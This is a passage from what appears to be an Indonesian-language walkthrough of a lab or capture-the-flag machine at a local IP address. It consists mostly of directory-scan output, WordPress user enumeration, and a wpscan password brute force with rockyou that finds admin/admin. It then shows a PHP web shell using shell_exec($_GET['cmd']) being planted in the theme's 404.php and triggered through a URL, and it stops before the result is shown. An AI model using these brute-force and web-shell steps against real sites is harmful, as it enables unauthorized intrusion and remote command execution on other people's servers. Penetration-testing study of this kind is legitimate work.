http://192.168.0.122/upload/admins/media/ ==> DIRECTORY: http://192.168.0.122/upload/admins/modules/ ==> DIRECTORY: http://192.168.0.122/upload/admins/pages/ ==> DIRECTORY: http://192.168.0.122/upload/admins/preferences/ ==> DIRECTORY: http://192.168.0.122/upload/admins/profiles/ ==> DIRECTORY: http://192.168.0.122/upload/admins/service/ ==> DIRECTORY: http://192.168.0.122/upload/admins/settings/ ==> DIRECTORY: http://192.168.0.122/upload/admins/start/ ==> DIRECTORY: http://192.168.0.122/upload/admins/support/ ==> DIRECTORY: http://192.168.0.122/upload/admins/templates/ ==> DIRECTORY: http://192.168.0.122/upload/admins/users/ ---- Entering directory: http://192.168.0.122/upload/framework/ ---- ==> DIRECTORY: http://192.168.0.122/upload/framework/functions/ + http://192.168.0.122/upload/framework/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/framework/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/framework/summary (CODE:403|SIZE:88) ---- Entering directory: http://192.168.0.122/upload/include/ ---- + http://192.168.0.122/upload/include/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/include/yui/ ---- Entering directory: http://192.168.0.122/upload/languages/ ---- + http://192.168.0.122/upload/languages/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/languages/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/media/ ---- + http://192.168.0.122/upload/media/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/media/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/ ---- + http://192.168.0.122/upload/modules/admin (CODE:403|SIZE:79) + http://192.168.0.122/upload/modules/admin.php (CODE:403|SIZE:79) + http://192.168.0.122/upload/modules/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/modules/news/ ==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/ ---- Entering directory: http://192.168.0.122/upload/page/ ---- + http://192.168.0.122/upload/page/index (CODE:200|SIZE:0) + http://192.168.0.122/upload/page/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/page/posts/ ---- Entering directory: http://192.168.0.122/upload/search/ ---- + http://192.168.0.122/upload/search/index (CODE:200|SIZE:3627) + http://192.168.0.122/upload/search/index.php (CODE:200|SIZE:3627) ---- Entering directory: http://192.168.0.122/upload/temp/ ---- + http://192.168.0.122/upload/temp/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/temp/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/temp/search/ ---- Entering directory: http://192.168.0.122/upload/templates/ ---- ==> DIRECTORY: http://192.168.0.122/upload/templates/blank/ + http://192.168.0.122/upload/templates/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/templates/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/index/ ---- (!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}. (Try using FineTunning: '-f') ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/ ---- + http://192.168.0.122/wordpress/wp-admin/about (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/admin (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/admin.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/comment (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/credits (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/css/ + http://192.168.0.122/wordpress/wp-admin/customize (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/edit (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/export (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/images/ + http://192.168.0.122/wordpress/wp-admin/import (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/includes/ + http://192.168.0.122/wordpress/wp-admin/index (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/index.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/install (CODE:200|SIZE:1080) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/js/ + http://192.168.0.122/wordpress/wp-admin/link (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/maint/ + http://192.168.0.122/wordpress/wp-admin/media (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/menu (CODE:500|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/moderation (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/network/ + http://192.168.0.122/wordpress/wp-admin/options (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/plugins (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/post (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/profile (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/themes (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/tools (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/update (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/upgrade (CODE:200|SIZE:1173) + http://192.168.0.122/wordpress/wp-admin/upload (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/user/ + http://192.168.0.122/wordpress/wp-admin/users (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/widgets (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/ ---- + http://192.168.0.122/wordpress/wp-content/index (CODE:200|SIZE:0) + http://192.168.0.122/wordpress/wp-content/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/plugins/ ==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/themes/ ==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/upgrade/ ==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/uploads/ ---- Entering directory: http://192.168.0.122/wordpress/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/upload/account/css/ ---- + http://192.168.0.122/upload/account/css/frontend (CODE:200|SIZE:1931) + http://192.168.0.122/upload/account/css/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/account/css/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/account/templates/ ---- + http://192.168.0.122/upload/account/templates/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/account/templates/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/access/ ---- + http://192.168.0.122/upload/admins/access/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/access/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/addons/ ---- + http://192.168.0.122/upload/admins/addons/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/addons/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/admintools/ ---- + http://192.168.0.122/upload/admins/admintools/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/admintools/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/admintools/tool (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/groups/ ---- + http://192.168.0.122/upload/admins/groups/add (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/groups/groups (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/groups/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/groups/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/groups/save (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/interface/ ---- + http://192.168.0.122/upload/admins/interface/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/interface/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/interface/version (CODE:403|SIZE:90) ---- Entering directory: http://192.168.0.122/upload/admins/languages/ ---- + http://192.168.0.122/upload/admins/languages/details (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/languages/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/languages/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/languages/install (CODE:500|SIZE:0) + http://192.168.0.122/upload/admins/languages/uninstall (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/login/ ---- ==> DIRECTORY: http://192.168.0.122/upload/admins/login/forgot/ + http://192.168.0.122/upload/admins/login/index (CODE:200|SIZE:2929) + http://192.168.0.122/upload/admins/login/index.php (CODE:200|SIZE:2929) ---- Entering directory: http://192.168.0.122/upload/admins/logout/ ---- + http://192.168.0.122/upload/admins/logout/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/logout/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/media/ ---- + http://192.168.0.122/upload/admins/media/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/media/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/media/thumb (CODE:200|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/modules/ ---- + http://192.168.0.122/upload/admins/modules/details (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/modules/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/modules/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/modules/install (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/modules/uninstall (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/pages/ ---- + http://192.168.0.122/upload/admins/pages/add (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/delete (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/modify (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/restore (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/save (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/sections (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/settings (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/pages/trash (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/preferences/ ---- + http://192.168.0.122/upload/admins/preferences/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/preferences/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/preferences/save (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/profiles/ ---- + http://192.168.0.122/upload/admins/profiles/index (CODE:200|SIZE:324) + http://192.168.0.122/upload/admins/profiles/index.php (CODE:200|SIZE:324) ---- Entering directory: http://192.168.0.122/upload/admins/service/ ---- + http://192.168.0.122/upload/admins/service/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/service/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/settings/ ---- + http://192.168.0.122/upload/admins/settings/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/settings/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/settings/save (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/settings/setting (CODE:200|SIZE:3839) ---- Entering directory: http://192.168.0.122/upload/admins/start/ ---- + http://192.168.0.122/upload/admins/start/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/start/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/support/ ---- + http://192.168.0.122/upload/admins/support/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/support/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/templates/ ---- + http://192.168.0.122/upload/admins/templates/details (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/templates/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/templates/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/templates/install (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/templates/uninstall (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/admins/users/ ---- + http://192.168.0.122/upload/admins/users/add (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/users/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/users/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/users/save (CODE:302|SIZE:0) + http://192.168.0.122/upload/admins/users/users (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/framework/functions/ ---- + http://192.168.0.122/upload/framework/functions/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/framework/functions/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/include/yui/ ---- ==> DIRECTORY: http://192.168.0.122/upload/include/yui/event/ + http://192.168.0.122/upload/include/yui/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/README (CODE:200|SIZE:8488) ==> DIRECTORY: http://192.168.0.122/upload/include/yui/yahoo/ ---- Entering directory: http://192.168.0.122/upload/modules/news/ ---- + http://192.168.0.122/upload/modules/news/add (CODE:403|SIZE:82) + http://192.168.0.122/upload/modules/news/comment (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.0.122/upload/modules/news/css/ + http://192.168.0.122/upload/modules/news/delete (CODE:403|SIZE:85) + http://192.168.0.122/upload/modules/news/icon (CODE:200|SIZE:1058) + http://192.168.0.122/upload/modules/news/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/info (CODE:403|SIZE:83) + http://192.168.0.122/upload/modules/news/info.php (CODE:403|SIZE:83) + http://192.168.0.122/upload/modules/news/install (CODE:403|SIZE:86) ==> DIRECTORY: http://192.168.0.122/upload/modules/news/languages/ + http://192.168.0.122/upload/modules/news/modify (CODE:403|SIZE:85) + http://192.168.0.122/upload/modules/news/rss (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/search (CODE:403|SIZE:85) ==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/ + http://192.168.0.122/upload/modules/news/uninstall (CODE:403|SIZE:88) + http://192.168.0.122/upload/modules/news/upgrade (CODE:403|SIZE:86) + http://192.168.0.122/upload/modules/news/view (CODE:403|SIZE:83) ---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/ ---- + http://192.168.0.122/upload/modules/wysiwyg/add (CODE:403|SIZE:85) + http://192.168.0.122/upload/modules/wysiwyg/delete (CODE:403|SIZE:88) + http://192.168.0.122/upload/modules/wysiwyg/icon (CODE:200|SIZE:1058) + http://192.168.0.122/upload/modules/wysiwyg/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/info (CODE:403|SIZE:86) + http://192.168.0.122/upload/modules/wysiwyg/info.php (CODE:403|SIZE:86) + http://192.168.0.122/upload/modules/wysiwyg/install (CODE:403|SIZE:89) ==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/languages/ + http://192.168.0.122/upload/modules/wysiwyg/modify (CODE:403|SIZE:88) + http://192.168.0.122/upload/modules/wysiwyg/save (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/search (CODE:403|SIZE:88) ==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/templates/ + http://192.168.0.122/upload/modules/wysiwyg/upgrade (CODE:403|SIZE:89) + http://192.168.0.122/upload/modules/wysiwyg/view (CODE:403|SIZE:86) ---- Entering directory: http://192.168.0.122/upload/page/posts/ ---- + http://192.168.0.122/upload/page/posts/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/page/posts/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/temp/search/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/upload/templates/blank/ ---- + http://192.168.0.122/upload/templates/blank/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/templates/blank/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/templates/blank/info (CODE:403|SIZE:86) + http://192.168.0.122/upload/templates/blank/info.php (CODE:403|SIZE:86) + http://192.168.0.122/upload/templates/blank/preview (CODE:200|SIZE:1377) + http://192.168.0.122/upload/templates/blank/template (CODE:200|SIZE:507) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/network/ ---- + http://192.168.0.122/wordpress/wp-admin/network/about (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/admin (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/credits (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/edit (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/index (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/menu (CODE:500|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/plugins (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/profile (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/settings (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/setup (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/sites (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/themes (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/update (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/upgrade (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/network/users (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-admin/user/ ---- + http://192.168.0.122/wordpress/wp-admin/user/about (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/admin (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/credits (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/index (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/menu (CODE:500|SIZE:0) + http://192.168.0.122/wordpress/wp-admin/user/profile (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/plugins/ ---- + http://192.168.0.122/wordpress/wp-content/plugins/hello (CODE:500|SIZE:0) + http://192.168.0.122/wordpress/wp-content/plugins/index (CODE:200|SIZE:0) + http://192.168.0.122/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/themes/ ---- + http://192.168.0.122/wordpress/wp-content/themes/index (CODE:200|SIZE:0) + http://192.168.0.122/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/upgrade/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/wordpress/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.0.122/upload/admins/login/forgot/ ---- + http://192.168.0.122/upload/admins/login/forgot/index (CODE:200|SIZE:2531) + http://192.168.0.122/upload/admins/login/forgot/index.php (CODE:200|SIZE:2531) ---- Entering directory: http://192.168.0.122/upload/include/yui/event/ ---- + http://192.168.0.122/upload/include/yui/event/event (CODE:200|SIZE:87537) + http://192.168.0.122/upload/include/yui/event/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/event/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/event/README (CODE:200|SIZE:9807) ---- Entering directory: http://192.168.0.122/upload/include/yui/yahoo/ ---- + http://192.168.0.122/upload/include/yui/yahoo/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/yahoo/index.php (CODE:302|SIZE:0) + http://192.168.0.122/upload/include/yui/yahoo/README (CODE:200|SIZE:2889) + http://192.168.0.122/upload/include/yui/yahoo/yahoo (CODE:200|SIZE:35223) ---- Entering directory: http://192.168.0.122/upload/modules/news/css/ ---- + http://192.168.0.122/upload/modules/news/css/backend (CODE:200|SIZE:1416) + http://192.168.0.122/upload/modules/news/css/frontend (CODE:200|SIZE:1771) + http://192.168.0.122/upload/modules/news/css/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/css/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/news/languages/ ---- + http://192.168.0.122/upload/modules/news/languages/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/languages/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/news/templates/ ---- ==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/backend/ + http://192.168.0.122/upload/modules/news/templates/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/templates/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/languages/ ---- + http://192.168.0.122/upload/modules/wysiwyg/languages/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/languages/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/templates/ ---- + http://192.168.0.122/upload/modules/wysiwyg/templates/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/wysiwyg/templates/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.0.122/upload/modules/news/templates/backend/ ---- + http://192.168.0.122/upload/modules/news/templates/backend/index (CODE:302|SIZE:0) + http://192.168.0.122/upload/modules/news/templates/backend/index.php (CODE:302|SIZE:0) ----------------- END_TIME: Mon Jan 23 21:35:16 2023 DOWNLOADED: 258272 - FOUND: 252
Coba,
dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w
Hasilny tidak beda jauh dengan sebelumnya.
Sepertinya ada CMS (Lepton CMS) yang mengintai target ini. Disini bisa dilihat terdapat 3 file/folder penting yaitu
/upload /wordpress /robots.txt
Akses robot.txt di URL
http://192.168.0.122/robots.txt
keluar tulisan,
Disallow: Hackers Allow: /wordpress/ ____ # /___ \_ _ __ _ ___ __ _ _ __ # // / / | | |/ _` |/ _ \ / _` | '__| #/ \_/ /| |_| | (_| | (_) | (_| | | #\___,_\ \__,_|\__,_|\___/ \__,_|_|
Akses /upload
http://192.168.0.122/upload/
Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190. Tampaknya kita lebih baik focus ke wordpress saja.
Wordpress Scanning
Scan Wordpress,
wpscan --url http://192.168.0.122/wordpress --enumerate u
hasilnya,
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.0.122/wordpress/ [192.168.0.122] [+] Started: Mon Jan 23 21:45:40 2023 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.2.22 (Ubuntu) | - X-Powered-By: PHP/5.3.10-1ubuntu3 | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.0.122/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://192.168.0.122/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.0.122/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.0.122/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07). | Found By: Rss Generator (Passive Detection) | - http://192.168.0.122/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator> | - http://192.168.0.122/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator> [+] WordPress theme in use: twentyfourteen | Location: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/ | Last Updated: 2022-11-02T00:00:00.000Z | [!] The version is out of date, the latest version is 3.5 | Style URL: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14 | Style Name: Twenty Fourteen | Style URI: http://wordpress.org/themes/twentyfourteen | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design... | Author: the WordPress team | Author URI: http://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Author Posts - Display Name (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] wpuser | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Mon Jan 23 21:45:46 2023 [+] Requests Done: 59 [+] Cached Requests: 6 [+] Data Sent: 15.813 KB [+] Data Received: 231.31 KB [+] Memory used: 186.273 MB [+] Elapsed time: 00:00:05
Yang di temukan,
What Fact /readme.html WordPress version 3.9.14 /wp-content/uploads/ Upload directory has directory listing enabled
Di temukan user,
Id Login Name 1 admin admin 2 wpuser wpuser
Wordpress Bruteforce password
Coba bruteforce,
wpscan --url http://192.168.0.122/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 50
setelah beberapa lama, hasilnya,
.........
[+] Performing password attack on Xmlrpc Multicall against 1 user/s [SUCCESS] - admin / admin All Found Progress Time: 00:01:41 < > (40 / 28688) 0.13% ETA: ??:??:?? [!] Valid Combinations Found: | Username: admin, Password: admin [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Mon Jan 23 21:55:08 2023 [+] Requests Done: 185 [+] Cached Requests: 39 [+] Data Sent: 52.958 KB [+] Data Received: 4.135 MB [+] Memory used: 338.531 MB [+] Elapsed time: 00:01:58
Tampaknya
username admin password admin
Inject cmd vulnerability
Coba login ke
http://192.168.0.122/wordpress/wp-login.php
Masuk ke
Appearance > Editor > 404 Template (404.php)
Masukan
<?php /** * The template for displaying 404 pages (Not Found) * * @package WordPress * @subpackage Twenty_Fourteen * @since Twenty Fourteen 1.0 */
echo "
"; echo shell_exec($_GET['cmd']); echo "
";
exit(); get_header(); ?>
Jangan lupa di Save setelah di tambahkan. Lakukan command injection lewat URL,
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd;%20ls%20-lah;%20id
Jika berhasil akan keluar,
